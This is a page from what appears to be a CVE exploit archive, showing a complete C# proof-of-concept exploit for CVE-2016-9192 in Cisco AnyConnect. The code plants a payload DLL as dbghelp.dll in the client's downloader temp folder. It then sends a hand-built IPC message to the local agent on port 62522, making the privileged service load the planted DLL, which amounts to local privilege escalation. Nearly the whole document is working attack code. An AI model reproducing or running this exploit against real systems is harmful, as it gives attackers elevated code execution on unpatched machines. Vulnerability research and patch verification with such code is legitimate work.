4837 Total CVEs
26 Years
GitHub
Home / 2016 / CVE-2016-9192
README.md
Rendering markdown...
POC / Poc.cs CS
⬇ Raw GitHub ✕ Close 
using System;
using System.IO;
using System.Net.Sockets;

public static class Poc {
	private readonly static byte[] LAUNCH_COMMAND = new byte[] {
		// Signature
		0x4F, 0x43, 0x53, 0x43,
		// Message header length
		0x1A, 0x00,
		// Message body length
		0xE4, 0x00,
		// IPC response
		0xFF, 0xFF, 0xFF, 0xFF,
		// Message user context
		0x00, 0x00, 0x00, 0x00,
		// Request message identifier
		0x02, 0x00, 0x00, 0x00,
		// Return IPC object
		0x00, 0x00, 0x00, 0x00,
		// Message type
		0x01,
		// Message identifier
		0x02,
		// File path
		// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
		0x00, 0x01, // Type
		0x00, 0x57, // Length
		0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
		0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
		0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
		0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
		0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
		0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
		0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
		0x78, 0x65, 0x00,
		// Command line (command line should start with "CAC-" or other valid command)
		// CAC-doesnt-matter
		0x00, 0x02, // Type
		0x00, 0x12, // Length
		0x43, 0x41, 0x43, 0x2D, 0x64, 0x6F, 0x65, 0x73, 0x6E, 0x74, 0x2D, 0x6D,
		0x61, 0x74, 0x74, 0x65, 0x72, 0x00,
		// GUI desktop (not mandatory)
		// WinSta0\Default
		0x00, 0x04,
		0x00, 0x10,
		0x57, 0x69, 0x6E, 0x53, 0x74, 0x61, 0x30, 0x5C, 0x44, 0x65, 0x66, 0x61,
		0x75, 0x6C, 0x74, 0x00,
		// Use installed
		// False
		0x80, 0x05,
		0x00, 0x00,
		// Relocatable file path
		// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
		0x00, 0x06,
		0x00, 0x57,
		0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
		0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
		0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
		0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
		0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
		0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
		0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
		0x78, 0x65, 0x00
	};
	
	private readonly static string TARGET_DIRECTORY =
		"C:\\ProgramData\\Cisco\\Cisco AnyConnect Secure Mobility Client\\Temp\\Downloader";

	private readonly static string TARGET_DLL =
		"dbghelp.dll";

	private readonly static string PAYLOAD_DLL =
		"poc.dll";

	public static void Main(string[] arguments) {
		TcpClient tcpClient = null;

		try {
			DirectoryInfo targetDirectory = new DirectoryInfo(TARGET_DIRECTORY);

			if (targetDirectory.Exists == false)
			{
				targetDirectory.Create();
			}

			FileInfo payloadDll = new FileInfo(PAYLOAD_DLL);

			if (payloadDll.Exists == false)
			{
				throw new Exception("Payload DLL missing from current directory");
			}

			payloadDll.CopyTo(Path.Combine(targetDirectory.FullName,
				TARGET_DLL), true);

			tcpClient = new TcpClient("127.0.0.1", 62522);

			NetworkStream clientStream = tcpClient.GetStream();
			clientStream.ReadTimeout = 5000;
			clientStream.Write(LAUNCH_COMMAND, 0, LAUNCH_COMMAND.Length);
			clientStream.Flush();
			clientStream.ReadByte();
		}
		catch (Exception exception) {
			Console.Error.WriteLine(exception);
		}
		finally {
			if (tcpClient != null) {
				tcpClient.Close();
			}
		}
	}
}